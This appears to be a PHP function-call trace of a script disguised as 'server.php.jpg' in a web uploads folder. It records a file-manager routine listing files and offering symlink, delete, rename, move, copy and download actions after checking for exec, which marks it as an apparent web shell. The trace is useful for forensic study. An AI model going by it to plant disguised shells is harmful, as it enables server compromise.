4	285	0	0.016520	802760	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1330	2	'group_name'	['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	285	1	0.016549	802824
4	285	R			TRUE
4	286	0	0.016563	802856	html	1		/var/www/html/uploads/server.php.jpg	1339	1	'/var/www/html/uploads/..'
5	287	0	0.016577	802856	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'/var/www/html/uploads/..'	2	NULL
5	287	1	0.016592	803128
5	287	R			'/var/www/html/uploads/..'
4	286	1	0.016607	803016
4	286	R			'/var/www/html/uploads/..'
3		A						/var/www/html/uploads/server.php.jpg	1342	$actions = []
4	288	0	0.016634	802384	function_exists	0		/var/www/html/uploads/server.php.jpg	1343	1	'symlink'
4	288	1	0.016648	802424
4	288	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1344	$actions[] = 'create_symlink'
4	289	0	0.016673	802760	dirname	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads/..'
4	289	1	0.016687	802848
4	289	R			'/var/www/html/uploads'
4	290	0	0.016702	802816	is_writable	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads'
4	290	1	0.016726	802856
4	290	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.php.jpg	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.php.jpg	1349	$actions[] = 'move'
4	291	0	0.016772	802760	function_exists	0		/var/www/html/uploads/server.php.jpg	1356	1	'exec'
4	291	1	0.016786	802800
4	291	R			TRUE
4	292	0	0.016799	802760	sizeof	0		/var/www/html/uploads/server.php.jpg	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	292	1	0.016817	802792
4	292	R			4
4	293	0	0.016837	802856	str_repeat	0		/var/www/html/uploads/server.php.jpg	1363	2	'&nbsp;'	30
4	293	1	0.016851	803144
4	293	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	294	0	0.016867	802824	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'create_symlink'
5	295	0	0.016881	802824	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'create symlink'	2	'UTF-8'
5	295	1	0.016896	803096
5	295	R			'create symlink'
4	294	1	0.016911	802984
4	294	R			'create symlink'
4	296	0	0.016925	802816	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'delete'
5	297	0	0.016938	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'delete'	2	'UTF-8'
5	297	1	0.016953	803088
5	297	R			'delete'
4	296	1	0.016967	802976
4	296	R			'delete'
4	298	0	0.016980	802816	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'rename'
5	299	0	0.016993	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'rename'	2	'UTF-8'
5	299	1	0.017007	803088
5	299	R			'rename'
4	298	1	0.017020	802976
4	298	R			'rename'
4	300	0	0.017034	802808	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'move'
5	301	0	0.017046	802808	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'move'	2	'UTF-8'
5	301	1	0.017061	803080
5	301	R			'move'
4	300	1	0.017074	802968
4	300	R			'move'
3		A						/var/www/html/uploads/server.php.jpg	1249	$i++
4	302	0	0.017099	802760	sizeof	0		/var/www/html/uploads/server.php.jpg	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	302	1	0.017172	802792
4	302	R			6
3		A						/var/www/html/uploads/server.php.jpg	1250	$file = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	303	0	0.017213	802760	date	0		/var/www/html/uploads/server.php.jpg	1252	2	'n/j/y H:i:s'	1676243054
4	303	1	0.017244	803088
4	303	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1252	$timestamps = 'mtime: 2/12/23 18:04:14, '
4	304	0	0.017271	802704	date	0		/var/www/html/uploads/server.php.jpg	1253	2	'n/j/y H:i:s'	1676243054
4	304	1	0.017302	803032
4	304	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1253	$timestamps .= 'atime: 2/12/23 18:04:14, '
4	305	0	0.017328	802728	date	0		/var/www/html/uploads/server.php.jpg	1254	2	'n/j/y H:i:s'	1676243054
4	305	1	0.017358	803056
4	305	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1254	$timestamps .= 'ctime: 2/12/23 18:04:14'
4	306	0	0.017385	802952	html	1		/var/www/html/uploads/server.php.jpg	1258	1	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
5	307	0	0.017399	802952	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'	2	NULL
5	307	1	0.017416	803256
5	307	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	306	1	0.017432	803144
4	306	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	308	0	0.017448	802816	urlencode	0		/var/www/html/uploads/server.php.jpg	1281	1	'/var/www/html/uploads/data'
4	308	1	0.017462	802912
4	308	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata'
4	309	0	0.017478	802856	html	1		/var/www/html/uploads/server.php.jpg	1281	1	'data'
5	310	0	0.017491	802856	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'data'	2	NULL
5	310	1	0.017505	803128
5	310	R			'data'
4	309	1	0.017518	803016
4	309	R			'data'
4	311	0	0.017533	802760	human_filesize	1		/var/www/html/uploads/server.php.jpg	1304	1	4096
4		A						/var/www/html/uploads/server.php.jpg	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/server.php.jpg	1155	$n = 0
4		A						/var/www/html/uploads/server.php.jpg	1157	$filesize /= 1024
4		A						/var/www/html/uploads/server.php.jpg	1158	$n++
5	312	0	0.017588	802760	strpos	0		/var/www/html/uploads/server.php.jpg	1161	2	4	'.'
5	312	1	0.017604	802832
5	312	R			FALSE
5	313	0	0.017618	802760	round	0		/var/www/html/uploads/server.php.jpg	1161	2	4	3
5	313	1	0.017630	802832
5	313	R			4
4		A						/var/www/html/uploads/server.php.jpg	1161	$filesize = 4
5	314	0	0.017654	802760	strpos	0		/var/www/html/uploads/server.php.jpg	1163	2	4	'.'
5	314	1	0.017667	803088
5	314	R			FALSE
5	315	0	0.017680	802760	substr	0		/var/www/html/uploads/server.php.jpg	1169	3	'kMGTPE'	0	1
5	315	1	0.017694	802856
5	315	R			'k'
4		A						/var/www/html/uploads/server.php.jpg	1169	$suffix = 'k'
4	311	1	0.017719	802792
4	311	R			'4 kB'
3		A						/var/www/html/uploads/server.php.jpg	1304	$human = ' title="4 kB"'
4	316	0	0.017744	802760	decoct	0		/var/www/html/uploads/server.php.jpg	1315	1	16895
4	316	1	0.017756	802832
4	316	R			'40777'
4	317	0	0.017769	802760	function_exists	0		/var/www/html/uploads/server.php.jpg	1317	1	'posix_getuid'
4	317	1	0.017783	802800
4	317	R			TRUE
4	318	0	0.017795	802760	posix_getuid	0		/var/www/html/uploads/server.php.jpg	1317	0
4	318	1	0.017808	802760
4	318	R			33
3		A						/var/www/html/uploads/server.php.jpg	1317	$l = FALSE
4	319	0	0.017831	802760	permission_octal2string	1		/var/www/html/uploads/server.php.jpg	1319	1	16895
4		A						/var/www/html/uploads/server.php.jpg	970	$type = 'd'
4		A						/var/www/html/uploads/server.php.jpg	979	$owner = 'r'
4		A						/var/www/html/uploads/server.php.jpg	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	984	$owner .= 'x'
4		A						/var/www/html/uploads/server.php.jpg	987	$group = 'r'
4		A						/var/www/html/uploads/server.php.jpg	988	$group .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	992	$group .= 'x'
4		A						/var/www/html/uploads/server.php.jpg	995	$other = 'r'
4		A						/var/www/html/uploads/server.php.jpg	996	$other .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	1000	$other .= 'x'
4	319	1	0.017943	802800
4	319	R			'drwxrwxrwx'
4	320	0	0.017957	802800	html	1		/var/www/html/uploads/server.php.jpg	1319	1	'drwxrwxrwx'
5	321	0	0.017970	802800	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'drwxrwxrwx'	2	NULL
5	321	1	0.017985	803072
5	321	R			'drwxrwxrwx'
4	320	1	0.017999	802960
4	320	R			'drwxrwxrwx'
4	322	0	0.018013	802760	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1324	2	'owner_name'	['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	322	1	0.018042	802824
4	322	R			TRUE
4	323	0	0.018056	802760	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1330	2	'group_name'	['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	323	1	0.018084	802824
4	323	R			TRUE
4	324	0	0.018097	802856	html	1		/var/www/html/uploads/server.php.jpg	1339	1	'/var/www/html/uploads/data'
5	325	0	0.018110	802856	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'/var/www/html/uploads/data'	2	NULL
5	325	1	0.018125	803128
5	325	R			'/var/www/html/uploads/data'
4	324	1	0.018140	803016
4	324	R			'/var/www/html/uploads/data'
3		A						/var/www/html/uploads/server.php.jpg	1342	$actions = []
4	326	0	0.018165	802384	function_exists	0		/var/www/html/uploads/server.php.jpg	1343	1	'symlink'
4	326	1	0.018178	802424
4	326	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1344	$actions[] = 'create_symlink'
4	327	0	0.018202	802760	dirname	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads/data'
4	327	1	0.018215	802848
4	327	R			'/var/www/html/uploads'
4	328	0	0.018229	802816	is_writable	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads'
4	328	1	0.018246	802856
4	328	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.php.jpg	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.php.jpg	1349	$actions[] = 'move'
4	329	0	0.018297	802760	function_exists	0		/var/www/html/uploads/server.php.jpg	1356	1	'exec'
4	329	1	0.018310	802800
4	329	R			TRUE
4	330	0	0.018323	802760	sizeof	0		/var/www/html/uploads/server.php.jpg	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	330	1	0.018340	802792
4	330	R			4
4	331	0	0.018352	802856	str_repeat	0		/var/www/html/uploads/server.php.jpg	1363	2	'&nbsp;'	30
4	331	1	0.018366	803144
4	331	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	332	0	0.018381	802824	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'create_symlink'
5	333	0	0.018395	802824	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'create symlink'	2	'UTF-8'
5	333	1	0.018410	803096
5	333	R			'create symlink'
4	332	1	0.018425	802984
4	332	R			'create symlink'
4	334	0	0.018440	802816	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'delete'
5	335	0	0.018453	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'delete'	2	'UTF-8'
5	335	1	0.018467	803088
5	335	R			'delete'
4	334	1	0.018480	802976
4	334	R			'delete'
4	336	0	0.018494	802816	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'rename'
5	337	0	0.018506	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'rename'	2	'UTF-8'
5	337	1	0.018520	803088
5	337	R			'rename'
4	336	1	0.018533	802976
4	336	R			'rename'
4	338	0	0.018547	802808	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'move'
5	339	0	0.018559	802808	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'move'	2	'UTF-8'
5	339	1	0.018574	803080
5	339	R			'move'
4	338	1	0.018587	802968
4	338	R			'move'
3		A						/var/www/html/uploads/server.php.jpg	1249	$i++
4	340	0	0.018611	802760	sizeof	0		/var/www/html/uploads/server.php.jpg	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	340	1	0.018682	802792
4	340	R			6
3		A						/var/www/html/uploads/server.php.jpg	1250	$file = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	341	0	0.018722	802760	date	0		/var/www/html/uploads/server.php.jpg	1252	2	'n/j/y H:i:s'	1676243054
4	341	1	0.018753	803088
4	341	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1252	$timestamps = 'mtime: 2/12/23 18:04:14, '
4	342	0	0.018780	802704	date	0		/var/www/html/uploads/server.php.jpg	1253	2	'n/j/y H:i:s'	1676243054
4	342	1	0.018810	803032
4	342	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1253	$timestamps .= 'atime: 2/12/23 18:04:14, '
4	343	0	0.018836	802728	date	0		/var/www/html/uploads/server.php.jpg	1254	2	'n/j/y H:i:s'	1676243054
4	343	1	0.018865	803056
4	343	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1254	$timestamps .= 'ctime: 2/12/23 18:04:14'
4	344	0	0.018891	802952	html	1		/var/www/html/uploads/server.php.jpg	1258	1	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
5	345	0	0.018905	802952	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'	2	NULL
5	345	1	0.018922	803256
5	345	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	344	1	0.018938	803144
4	344	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	346	0	0.019051	802760	substr	0		/var/www/html/uploads/server.php.jpg	1289	3	'.htaccess'	0	1
4	346	1	0.019067	802856
4	346	R			'.'
4	347	0	0.019081	802840	urlencode	0		/var/www/html/uploads/server.php.jpg	1296	1	'/var/www/html/uploads/.htaccess'
4	347	1	0.019095	802952
4	347	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.htaccess'
4	348	0	0.019111	802888	html	1		/var/www/html/uploads/server.php.jpg	1296	1	'.htaccess'
5	349	0	0.019133	802888	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'.htaccess'	2	NULL
5	349	1	0.019152	803160
5	349	R			'.htaccess'
4	348	1	0.019166	803048
4	348	R			'.htaccess'
3		A						/var/www/html/uploads/server.php.jpg	1306	$human = ''
4	350	0	0.019192	802720	decoct	0		/var/www/html/uploads/server.php.jpg	1315	1	33188
4	350	1	0.019205	802792
4	350	R			'100644'
4	351	0	0.019218	802720	function_exists	0		/var/www/html/uploads/server.php.jpg	1317	1	'posix_getuid'
4	351	1	0.019231	802760
4	351	R			TRUE
4	352	0	0.019244	802720	posix_getuid	0		/var/www/html/uploads/server.php.jpg	1317	0
4	352	1	0.019256	802720
4	352	R			33
3		A						/var/www/html/uploads/server.php.jpg	1317	$l = FALSE
4	353	0	0.019279	802720	permission_octal2string	1		/var/www/html/uploads/server.php.jpg	1319	1	33188
4		A						/var/www/html/uploads/server.php.jpg	966	$type = '-'
4		A						/var/www/html/uploads/server.php.jpg	979	$owner = 'r'
4		A						/var/www/html/uploads/server.php.jpg	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	984	$owner .= '-'
4		A						/var/www/html/uploads/server.php.jpg	987	$group = 'r'
4		A						/var/www/html/uploads/server.php.jpg	988	$group .= '-'
4		A						/var/www/html/uploads/server.php.jpg	992	$group .= '-'
4		A						/var/www/html/uploads/server.php.jpg	995	$other = 'r'
4		A						/var/www/html/uploads/server.php.jpg	996	$other .= '-'
4		A						/var/www/html/uploads/server.php.jpg	1000	$other .= '-'
4	353	1	0.019393	802760
4	353	R			'-rw-r--r--'
4	354	0	0.019406	802760	html	1		/var/www/html/uploads/server.php.jpg	1319	1	'-rw-r--r--'
5	355	0	0.019419	802760	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'-rw-r--r--'	2	NULL
5	355	1	0.019434	803032
5	355	R			'-rw-r--r--'
4	354	1	0.019447	802920
4	354	R			'-rw-r--r--'
4	356	0	0.019461	802720	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1324	2	'owner_name'	['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	356	1	0.019490	802784
4	356	R			TRUE
4	357	0	0.019504	802720	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1330	2	'group_name'	['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	357	1	0.019532	802784
4	357	R			TRUE
4	358	0	0.019545	802816	html	1		/var/www/html/uploads/server.php.jpg	1339	1	'/var/www/html/uploads/.htaccess'
5	359	0	0.019559	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'/var/www/html/uploads/.htaccess'	2	NULL
5	359	1	0.019574	803088
5	359	R			'/var/www/html/uploads/.htaccess'
4	358	1	0.019589	802976
4	358	R			'/var/www/html/uploads/.htaccess'
3		A						/var/www/html/uploads/server.php.jpg	1342	$actions = []
4	360	0	0.019615	802344	function_exists	0		/var/www/html/uploads/server.php.jpg	1343	1	'symlink'
4	360	1	0.019628	802384
4	360	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1344	$actions[] = 'create_symlink'
4	361	0	0.019653	802720	dirname	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads/.htaccess'
4	361	1	0.019666	802808
4	361	R			'/var/www/html/uploads'
4	362	0	0.019680	802776	is_writable	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads'
4	362	1	0.019697	802816
4	362	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.php.jpg	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.php.jpg	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/server.php.jpg	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/server.php.jpg	1353	$actions[] = 'download'
4	363	0	0.019762	802720	function_exists	0		/var/www/html/uploads/server.php.jpg	1356	1	'exec'
4	363	1	0.019776	802760
4	363	R			TRUE
4	364	0	0.019789	802720	sizeof	0		/var/www/html/uploads/server.php.jpg	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download']
4	364	1	0.019807	802752
4	364	R			6
4	365	0	0.019825	802816	str_repeat	0		/var/www/html/uploads/server.php.jpg	1363	2	'&nbsp;'	30
4	365	1	0.019839	803104
4	365	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	366	0	0.019855	802784	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'create_symlink'
5	367	0	0.019868	802784	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'create symlink'	2	'UTF-8'
5	367	1	0.019884	803056
5	367	R			'create symlink'
4	366	1	0.019899	802944
4	366	R			'create symlink'
4	368	0	0.019913	802776	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'delete'
5	369	0	0.019926	802776	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'delete'	2	'UTF-8'
5	369	1	0.019940	803048
5	369	R			'delete'
4	368	1	0.019954	802936
4	368	R			'delete'
4	370	0	0.019967	802776	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'rename'
5	371	0	0.019980	802776	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'rename'	2	'UTF-8'
5	371	1	0.019994	803048
5	371	R			'rename'
4	370	1	0.020008	802936
4	370	R			'rename'
4	372	0	0.020021	802768	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'move'
5	373	0	0.020034	802768	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'move'	2	'UTF-8'
5	373	1	0.020048	803040
5	373	R			'move'
4	372	1	0.020061	802928
4	372	R			'move'
4	374	0	0.020074	802768	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'copy'
5	375	0	0.020087	802768	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'copy'	2	'UTF-8'
5	375	1	0.020101	803040
5	375	R			'copy'
4	374	1	0.020114	802928
4	374	R			'copy'
4	376	0	0.020127	802776	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'download'
5	377	0	0.020140	802776	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'download'	2	'UTF-8'
5	377	1	0.020155	803048
5	377	R			'download'
4	376	1	0.020168	802936
4	376	R			'download'
3		A						/var/www/html/uploads/server.php.jpg	1249	$i++
